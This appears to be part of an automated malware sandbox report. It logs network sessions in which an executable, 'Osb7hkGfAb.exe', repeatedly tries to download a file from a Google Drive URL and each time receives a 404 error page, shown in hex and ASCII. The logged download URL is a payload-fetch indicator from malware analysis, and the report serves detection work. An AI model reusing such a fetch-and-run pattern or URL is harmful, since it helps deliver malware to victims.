                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 32 77 6a 4f 4d 6b 52 37 57 70 76 70 44 4e 65 77 66 31 34 53 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="22wjOMkR7WpvpDNewf14Sw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.949749142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:42 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:43 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:43 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-mhS4qpka1digx4_We3zVvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.949750216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:43 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:44 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC7125rOZLJkYAqH8_XKGSO2hw7V0L9VCcFcVvxFd8uVpRpSZdF2dRRxbqW7RExbNDqf_JQbmfY
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:44 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-M_LpJyStBhvDr60Aj4d1Hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:44 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 64 52 35 63 66 6b 74 79 2d 41 4e 61 6f 5a 69 44 62 54 54 2d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VdR5cfkty-ANaoZiDbTT-Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.949751142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:45 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:45 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:45 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-DlRLId_q7s6e9deAyhmkdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.949752216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:46 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:46 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC59DtgYvImoCUKpyOJU2rryNrML5FTqWHMjclJN9zXFuh_MCf1rm8kDb1enhwRX5yh8
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:46 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-XPYyQiHb1P7pQwGqRObfHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:46 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 6f 6b 5a 59 42 47 30 32 6b 59 32 66 74 76 73 61 48 58 6d 51 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eokZYBG02kY2ftvsaHXmQQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.949753142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:47 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:47 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:47 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-fPI3DFTEiPTX_ZcVXL-F6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.949754216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:48 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:48 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRDxVkgOpnc0PBTqVzi6X0AXzLturf9v2kFRWkZMCWLo_Z9KymZu6CpimXuaGXhStNI
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:48 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-cIFQRqOBdjigvFZ33GPdsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:48 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 33 6e 50 72 69 43 6e 48 31 67 70 73 4c 46 76 65 62 79 43 70 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="k3nPriCnH1gpsLFvebyCpA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                44192.168.2.949755142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:49 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:49 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:49 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-ZF5be2McWXsvPsdlpLnrnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                45192.168.2.949756216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:50 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:51 UTC1851INHTTP/1.1 404 Not Found
